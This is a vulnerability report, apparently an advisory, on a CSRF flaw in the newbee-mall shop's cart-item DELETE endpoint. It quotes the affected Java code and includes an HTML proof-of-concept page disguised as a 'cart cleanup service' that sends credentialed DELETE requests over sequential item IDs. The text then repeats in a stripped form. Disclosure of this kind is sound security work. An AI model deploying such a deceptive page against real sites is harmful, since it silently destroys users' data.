CSRF Vulnerability in Shopping Cart Item Deletion
Summary
A CSRF vulnerability exists in the shopping cart deletion endpoint /shop-cart/{cartItemId} (DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections.
Vulnerability Details
Configuration-Level Issue
File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/shop-cart/**");
// ❌ No CSRF token validation
}
}Endpoint-Level Code Analysis
File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 93-105)
@DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId,
HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
// ❌ No CSRF token validation
// ⚠️ Cart item IDs are sequential and predictable
Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId());
if (deleteResult) {
return ResultGenerator.genSuccessResult();
}
return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult());
}Security Issues:
- ❌ No CSRF token validation
- ⚠️ Cart item IDs are predictable (sequential integers)
- ⚠️ Can delete multiple items in batch
Proof of Concept (PoC)
<!DOCTYPE html>
<html>
<head>
<title>Cart Cleanup Service</title>
</head>
<body>
<h2>🧹 Cleaning expired items from cart...</h2>
<div id="progress">Processing...</div>
<script>
// Delete cart items by guessing sequential IDs
var deletedCount = 0;
for (var i = 1; i <= 100; i++) {
fetch('http://localhost:28089/shop-cart/' + i, {
method: 'DELETE',
credentials: 'include'
})
.then(response => response.json())
.then(data => {
if (data.resultCode == 200) {
deletedCount++;
document.getElementById('progress').innerHTML =
'Removed ' + deletedCount + ' expired items';
}
});
}
setTimeout(function() {
document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!';
}, 3000);
</script>
</body>
</html>Impact
Shopping cart emptying causing user inconvenience - Users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss.
CVSS Score: 5.3 (Medium)
CSRF Vulnerability in Shopping Cart Item Deletion
Summary
A CSRF vulnerability exists in the shopping cart deletion endpoint
/shop-cart/{cartItemId}(DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections.Vulnerability Details
Configuration-Level Issue
File:
src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.javaEndpoint-Level Code Analysis
File:
src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java(Lines 93-105)Security Issues:
Proof of Concept (PoC)
Impact
Shopping cart emptying causing user inconvenience - Users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss.
CVSS Score: 5.3 (Medium)